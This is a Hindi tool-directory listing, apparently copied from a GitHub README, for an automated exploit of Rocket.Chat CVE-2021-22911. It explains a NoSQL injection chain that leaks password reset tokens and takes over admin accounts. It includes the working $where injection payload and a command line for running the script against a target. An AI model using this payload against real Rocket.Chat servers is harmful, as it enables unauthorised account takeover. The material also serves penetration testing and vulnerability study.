Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
RocketChat-NoSQLi-Chain-CVE-2021-22911 — Rocket.Chat NoSQL इंजेक्शन (CVE-2021-22911) के लिए स्वचालित शोषण जो पासवर्ड रीसेट टोकन लीक करता है और बिना प्रमाणीकरण के खाता अधिग्रहण करता है। | Kitploit
उपकरण/GitHubGitHub/tenebrae93/rocketchat-nosqli-chain-cve-2021-22911
पासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubtenebrae93/rocketchat-nosqli-chain-cve-2021-22911

RocketChat-NoSQLi-Chain-CVE-2021-22911

Rocket.Chat NoSQL इंजेक्शन (CVE-2021-22911) के लिए स्वचालित शोषण जो पासवर्ड रीसेट टोकन लीक करता है और बिना प्रमाणीकरण के खाता अधिग्रहण करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
16 महीने पहलेअभी तक समीक्षित नहीं

Rocket.Chat NoSQLi Token Leak & Password Reset

Rocket.Chat (और Meteor-आधारित अनुप्रयोगों) के लिए एक स्वचालित शोषण स्क्रिप्ट जो NoSQL Injection का उपयोग करती है $where क्लॉज के माध्यम से सर्वर-साइड अपवादों के ज़रिए पासवर्ड रीसेट टोकन को लीक करने के लिए। एक बार टोकन लीक हो जाने पर, स्क्रिप्ट बिना प्रमाणीकरण के पासवर्ड रीसेट करती है।

भेद्यता अवलोकन

  1. प्रमाणीकरण: स्क्रिप्ट एक मानक उपयोगकर्ता के रूप में प्रमाणित होती है ताकि /api/v1/users.list एंडपॉइंट तक पहुँच प्राप्त कर सके।

  2. NoSQL Injection: यह query पैरामीटर का उपयोग करके एक $where जावास्क्रिप्ट क्लॉज इंजेक्ट करता है।

  3. डेटा एक्सफिल्ट्रेशन: इंजेक्शन के भीतर throw स्टेटमेंट का उपयोग करके, यह सर्वर को लक्षित उपयोगकर्ता के पासवर्ड रीसेट टोकन युक्त "uncaught exception" त्रुटि लौटाने के लिए मजबूर करता है।

  4. अकाउंट टेकओवर: स्क्रिप्ट लीक किए गए टोकन का उपयोग करके resetPassword को कॉल करती है, लक्षित खाते का पासवर्ड बदल देती है।

उपयोग

आवश्यक शर्तें

  • Python 3.x

  • requests लाइब्रेरी

बैश

root@kitploit:~
pip install requests

निष्पादन

बैश

root@kitploit:~
python3 exploit.py --url http://<TARGET_IP>:3000\
                   -u <YOUR_USER>\
                   -p <YOUR_PASS>\
                   -a <TARGET_ADMIN_USER>\
                   -ap <NEW_ADMIN_PASSWORD>

कमांड लाइन तर्क

शोषण श्रृंखला विवरण

शोषण का मूल इंजेक्शन स्ट्रिंग है:

JavaScript

root@kitploit:~
{"$where":"this.username==='admin' && (()=>{ throw this.services.password.reset.token })()"}

जब सर्वर द्वारा प्रोसेस किया जाता है, तो डेटाबेस इंजन अनाम फ़ंक्शन को निष्पादित करता है, throw पर क्रैश हो जाता है, और एप्लिकेशन अपवाद को पकड़ लेता है, अनजाने में गुप्त टोकन को JSON त्रुटि प्रतिक्रिया में उपयोगकर्ता को वापस भेज देता है।

टूल डाउनलोड करें
तर्कलॉन्ग फ्लैगविवरण
-u--userप्रारंभिक प्रमाणीकरण के लिए आपका मान्य उपयोगकर्ता नाम या ईमेल।
-p--passwordआपका मान्य पासवर्ड।
-a--adminवह खाता जिसका पासवर्ड आप रीसेट करना चाहते हैं, उसका उपयोगकर्ता नाम।
-ap--admin-passएडमिन खाते के लिए सेट किया जाने वाला नया पासवर्ड।
--urlRocket.Chat इंस्टेंस का बेस URL।